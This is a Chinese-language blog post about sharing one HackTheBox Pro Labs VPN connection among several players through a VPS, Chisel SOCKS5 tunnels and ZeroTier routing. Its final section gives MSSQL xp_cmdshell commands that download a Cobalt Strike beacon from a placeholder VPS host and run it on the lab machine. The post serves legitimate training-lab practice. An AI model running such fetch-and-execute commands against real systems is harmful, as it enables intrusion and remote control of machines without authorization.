<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/favicon.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"lamber-maybe.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="HTB pro labs限制了靶场的openvpn代理只能在一台机器上开启，如果有第二台机器尝试连接靶场的openvpn文件，就会连接不上。那我如果要和朋友们一起打HTB pro labs要怎么办呢？ 方案一、在 vps 上连接靶场，玩家登上 vps 进行游玩最初的方案，是在 vps 连接靶场的openvpn代理，每个玩家直接登录该 vps 游玩。 但是这个方案很快就否决了，原因如下：  vps">
<meta property="og:type" content="article">
<meta property="og:title" content="如何多人一起打HackTheBox">
<meta property="og:url" content="https://lamber-maybe.com/2024/10/24/Multiplayer-HTB/index.html">
<meta property="og:site_name" content="Lamber&#39;s Blog">
<meta property="og:description" content="HTB pro labs限制了靶场的openvpn代理只能在一台机器上开启，如果有第二台机器尝试连接靶场的openvpn文件，就会连接不上。那我如果要和朋友们一起打HTB pro labs要怎么办呢？ 方案一、在 vps 上连接靶场，玩家登上 vps 进行游玩最初的方案，是在 vps 连接靶场的openvpn代理，每个玩家直接登录该 vps 游玩。 但是这个方案很快就否决了，原因如下：  vps">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/chisel_collaboration_1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/chisel_collaboration_2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/KALI-to-DANTE-WEB-NIX01-chisel-reverse-socks5.gif">
<meta property="og:image" content="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/vps-to-htb.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/kali-to-vps.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/kali-to-htb.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/202410251157628.png">
<meta property="article:published_time" content="2024-10-24T08:33:14.000Z">
<meta property="article:modified_time" content="2024-10-25T09:26:58.096Z">
<meta property="article:author" content="Lamber">
<meta property="article:tag" content="Google,Sitemap,SEO,Hexo,Security,HackThebox,Tryhackme,Hackerone,Red Team,Blue Team">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/chisel_collaboration_1.png">


<link rel="canonical" href="https://lamber-maybe.com/2024/10/24/Multiplayer-HTB/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://lamber-maybe.com/2024/10/24/Multiplayer-HTB/","path":"2024/10/24/Multiplayer-HTB/","title":"如何多人一起打HackTheBox"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>如何多人一起打HackTheBox | Lamber's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Lamber's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">终身学习</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-友情链接"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友情链接</a></li><li class="menu-item menu-item-sitemap"><a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E6%A1%88%E4%B8%80%E3%80%81%E5%9C%A8-vps-%E4%B8%8A%E8%BF%9E%E6%8E%A5%E9%9D%B6%E5%9C%BA%EF%BC%8C%E7%8E%A9%E5%AE%B6%E7%99%BB%E4%B8%8A-vps-%E8%BF%9B%E8%A1%8C%E6%B8%B8%E7%8E%A9"><span class="nav-number">1.</span> <span class="nav-text">方案一、在 vps 上连接靶场，玩家登上 vps 进行游玩</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E6%A1%88%E4%BA%8C%E3%80%81%E4%BD%BF%E7%94%A8-Chisel-%E6%90%AD%E5%BB%BA-Socks5%E9%9A%A7%E9%81%93%EF%BC%8C%E7%8E%A9%E5%AE%B6%E4%BD%BF%E7%94%A8-Socks5%E9%9A%A7%E9%81%93%E8%BF%9B%E8%A1%8C%E6%B8%B8%E7%8E%A9"><span class="nav-number">2.</span> <span class="nav-text">方案二、使用 Chisel 搭建 Socks5隧道，玩家使用 Socks5隧道进行游玩</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E6%A1%88%E4%BA%8C%E7%82%B9%E4%BA%94%E3%80%81%E6%94%B9%E8%BF%9B%E5%8E%9F-Chisel-%E6%90%AD%E5%BB%BA%E6%96%B9%E6%A1%88"><span class="nav-number">3.</span> <span class="nav-text">方案二点五、改进原 Chisel 搭建方案</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E6%A1%88%E4%B8%89%E3%80%81%E4%BD%BF%E7%94%A8Zerotire%E7%BB%84%E7%BD%91"><span class="nav-number">4.</span> <span class="nav-text">方案三、使用Zerotire组网</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A4%9A%E4%BA%BA%E6%83%85%E5%86%B5%E4%B8%8B%E5%A6%82%E4%BD%95%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">5.</span> <span class="nav-text">多人情况下如何反弹shell?</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Lamber"
      src="/uploads/xiaolin.jpg">
  <p class="site-author-name" itemprop="name">Lamber</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/Lamber-maybe" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Lamber-maybe" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://lamber-maybe.com/2024/10/24/Multiplayer-HTB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/uploads/xiaolin.jpg">
      <meta itemprop="name" content="Lamber">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Lamber's Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="如何多人一起打HackTheBox | Lamber's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          如何多人一起打HackTheBox
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-10-24 16:33:14" itemprop="dateCreated datePublished" datetime="2024-10-24T16:33:14+08:00">2024-10-24</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-10-25 17:26:58" itemprop="dateModified" datetime="2024-10-25T17:26:58+08:00">2024-10-25</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/HackTheBox/" itemprop="url" rel="index"><span itemprop="name">HackTheBox</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>1.6k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>6 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>HTB pro labs限制了靶场的openvpn代理只能在一台机器上开启，<br>如果有第二台机器尝试连接靶场的openvpn文件，就会连接不上。那我如果要和朋友们一起打HTB pro labs要怎么办呢？</p>
<h2 id="方案一、在-vps-上连接靶场，玩家登上-vps-进行游玩"><a href="#方案一、在-vps-上连接靶场，玩家登上-vps-进行游玩" class="headerlink" title="方案一、在 vps 上连接靶场，玩家登上 vps 进行游玩"></a>方案一、在 vps 上连接靶场，玩家登上 vps 进行游玩</h2><p>最初的方案，是在 vps 连接靶场的openvpn代理，每个玩家直接登录该 vps 游玩。</p>
<p>但是这个方案很快就否决了，原因如下：</p>
<ol>
<li>vps 缺少GUI界面，而有些玩家比较习惯GUI界面操作</li>
<li>如果玩家顺势在 vps 上记录攻击线索或者安装一堆与靶场有关的工具，不同玩家之间就会互相剧透。</li>
<li>如果某玩家把 vps 的环境搞崩溃，如果回退环境，也会影响到其它玩家。</li>
</ol>
<h2 id="方案二、使用-Chisel-搭建-Socks5隧道，玩家使用-Socks5隧道进行游玩"><a href="#方案二、使用-Chisel-搭建-Socks5隧道，玩家使用-Socks5隧道进行游玩" class="headerlink" title="方案二、使用 Chisel 搭建 Socks5隧道，玩家使用 Socks5隧道进行游玩"></a>方案二、使用 Chisel 搭建 Socks5隧道，玩家使用 Socks5隧道进行游玩</h2><p>在仔细查阅 Chisel 的官方文档之后，实现了一种通过 Chisel 代理实现多人共同游玩的方案：</p>
<p><img src="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/chisel_collaboration_1.png" alt="chisel_collaboration_1"></p>
<ol>
<li>首先，在 vps 上启动openvpn连接靶场节点</li>
<li>然后，在 vps 上启动 Chisel 服务端</li>
<li>然后仿照单人游玩的操作，在入口机上使用 Chisel 客户端，连接 vps 上的 Chisel 服务端。</li>
<li>实际的操作都和单人游玩一样。成功在 VPS 和入口机之间建立了一条 Socks5 隧道。</li>
<li>这样所有人都可以通过设置本地socks代理，代理地址为 <code>socks5 107.173.157.111 1080</code> 。从而访问到靶场内部</li>
</ol>
<p>虽然这种方案解决了多人一起玩的需求，但是前提是得有某一个人拿下入口机的权限，去入口机上架设socks5隧道。那如果想要让大家都真正的从零开始玩呢？比如从扫描靶机网段，探测入口机地址开始。</p>
<h2 id="方案二点五、改进原-Chisel-搭建方案"><a href="#方案二点五、改进原-Chisel-搭建方案" class="headerlink" title="方案二点五、改进原 Chisel 搭建方案"></a>方案二点五、改进原 Chisel 搭建方案</h2><p><img src="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/chisel_collaboration_2.png" alt="chisel_collaboration_2"></p>
<p>经过了一番思考，改进了一下上一版方案：</p>
<ol>
<li>在 VPS 上，启动 Chisel 客户端，连接 VPS 上已经启动好的 Chisel 服务端</li>
<li>这样所有人通过设置本地 socks 代理，代理地址为 <code>socks5 107.173.157.111 1081</code> 。从而和靶场入口网段连通</li>
</ol>
<h2 id="方案三、使用Zerotire组网"><a href="#方案三、使用Zerotire组网" class="headerlink" title="方案三、使用Zerotire组网"></a>方案三、使用Zerotire组网</h2><p>虽然现在已经可以大家分别在本地，通过socks5代理访问靶场网段。但是又遇到了新的体验问题：</p>
<ol>
<li>Socks5隧道不能支持代理 ICMP 和 ARP 协议，直接导致无法使用 nmap 最快的 ICMP 扫描，入口网段的存活机器探测和开放端口扫描都会变得特别慢。</li>
</ol>
<p>经过一番调查，采用 Zerotire 作为新一版的多人游玩方案。</p>
<ol>
<li>在 VPS 上安装 Zerotire</li>
<li>在 Zerotire 控制台，设置路由转发规则 ，通过 VPS 去访问目的地址为 <code>10.10.110.0/24</code> ，并为 VPS 设置 iptables 流量转发</li>
</ol>
<p>这样所有玩家，直接加入 Zerotire 网络即可访问靶场网段。</p>
<p>同时，在 VPS上保留了一个 Chisel 服务端。当玩家打完入口机之后，可以使用 scp 将 Chisel 传到入口机上，<br>然后连接 VPS 的 Chisel 服务端启动一条socks5隧道用于后续内网穿透。和 Chisel 方案操作一致。</p>
<p><img src="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/KALI-to-DANTE-WEB-NIX01-chisel-reverse-socks5.gif" alt="KALI-to-DANTE-WEB-NIX01-chisel-reverse-socks5"></p>
<p>使用 Zerotire 方案已经解决了很大一部分的靶场稳定性和速度问题。进一步优化靶场速度，只能从 VPS 的位置考虑。</p>
<p>Hack The Box的总部位于英国伦敦，选择位于伦敦的 VPS 可以将 VPS 与靶场之间的通信延迟，降低到 10ms。</p>
<p>这时候再考虑 VPS 与国内之间的通信延迟，尽可能低即可。</p>
<p>原本为了实现低延迟，考虑选用CN2 GIA线路的 VPS，即从国外到国内走单独的直连线路。延迟最低，价格也最贵。是的，价格太昂贵了，只是为了用来搭建低延迟的多人协作靶场，属实是大材小用了。</p>
<p>然后，开始横向对比多家云服务器厂商的普通产品。最后选定了 <a target="_blank" rel="noopener" href="https://www.vultr.com/">vultr</a> 家的伦敦节点 VPS，采用最抠门配置，1核1G。<br>每月6美元，并且可以用 paypal 余额支付，非常划算。</p>
<p>VPS 与 靶场直连的延迟平均为1.5ms：</p>
<p><img src="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/vps-to-htb.jpg" alt="vps-to-htb"></p>
<p>本地 与 VPS 直连的延迟平均为170ms：</p>
<p><img src="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/kali-to-vps.jpg" alt="kali-to-vps"></p>
<p>整体使用效果平均为172ms：</p>
<p><img src="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/kali-to-htb.jpg" alt="kali-to-htb"></p>
<p>这样有个好处，如果还嫌本地和靶场交互操作慢，可以选择接梯子加速连上VPS，从VPS和靶场直接交互，延迟只有不到3ms。</p>
<h2 id="多人情况下如何反弹shell"><a href="#多人情况下如何反弹shell" class="headerlink" title="多人情况下如何反弹shell?"></a>多人情况下如何反弹shell?</h2><p>由于多人一起打，本质上是通过一个公用vps将所有人的流量集体转发到HTB靶场内部，如下图:</p>
<pre><code class="highlight mermaid">flowchart LR
    A[player 1] --&gt; B(vps)
    C[player 2] --&gt; B(vps)
    D[player 3] --&gt; B(vps)
    B(vps) --&gt;|请求| E[HTB]
    E[HTB] --&gt;|响应| B(vps)
</code></pre>

<p>所以想要反弹shell，只能反弹到vps上，并不能直接反弹到每个玩家的攻击机上。</p>
<p><strong>那么有没有什么解决办法呢？</strong></p>
<p>有，我们可以直接用一种更高级的“反弹shell”手段，即使用C2工具。</p>
<p>既然能反弹shell，说明一定能执行命令，那么就可以通过执行命令，下载C2工具的beacon然后直接将受害机上线。</p>
<p>以 CobaltStrike 为例，在 vps 上启动 CobaltStrike 的 teamserver</p>
<p><img src="https://raw.githubusercontent.com/Lamber-maybe/blog-img/master/blog-img/202410251157628.png" alt="202410251157628"></p>
<p>反弹shell 以 mssql 的 xp_cmdshell 为例，首先生成一个 CS 的 beacon，然后用python启动一个临时的web服务，使用 xp_cmdshell 下载 beacon 并执行</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">exec</span> xp_cmdshell <span class="string">&#x27;powershell.exe wget http://vps-ip:8000/cs.exe -OutFile C:\\Users\Public\\cs.exe&#x27;</span></span><br><span class="line"><span class="keyword">exec</span> xp_cmdshell <span class="string">&#x27;C:\\Users\Public\\cs.exe&#x27;</span></span><br></pre></td></tr></table></figure>

<p>这样每个玩家就可以在自己的攻击机上面，连接 teamserver 去控制受害机了。</p>
<p>注：如果想要让每个玩家之间互不剧透或者走捷径，即A玩家上线了一台受害主机之后，不想让B玩家直接操控这台主机（想让B玩家自己从头完整打一遍），可以找一个有权限分级的C2工具来用。</p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Lamber
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://lamber-maybe.com/2024/10/24/Multiplayer-HTB/" title="如何多人一起打HackTheBox">https://lamber-maybe.com/2024/10/24/Multiplayer-HTB/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="followme">
  <span>欢迎关注我的其它发布渠道</span>

  <div class="social-list">

      <div class="social-item">
          <a target="_blank" class="social-link" href="https://twitter.com/Lamber28793923">
            <span class="icon">
              <i class="fab fa-twitter"></i>
            </span>

            <span class="label">Twitter</span>
          </a>
      </div>
  </div>
</div>


        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/10/19/Ubuntu-LAMP/" rel="prev" title="Ubuntu22.04搭建WEB环境(LAMP环境)">
                  <i class="fa fa-angle-left"></i> Ubuntu22.04搭建WEB环境(LAMP环境)
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/10/24/HTB-Pro-Labs-Dante/" rel="next" title="HTB-Pro-Labs-Dante">
                  HTB-Pro-Labs-Dante <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Lamber</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">16k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">59 分钟</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  

  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mermaid/10.9.1/mermaid.min.js","integrity":"sha256-YbM1pG3wWnzhyYN49g5fPnen+2CKEFaZfopkkwSpNtY="}}</script>
  <script src="/js/third-party/tags/mermaid.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
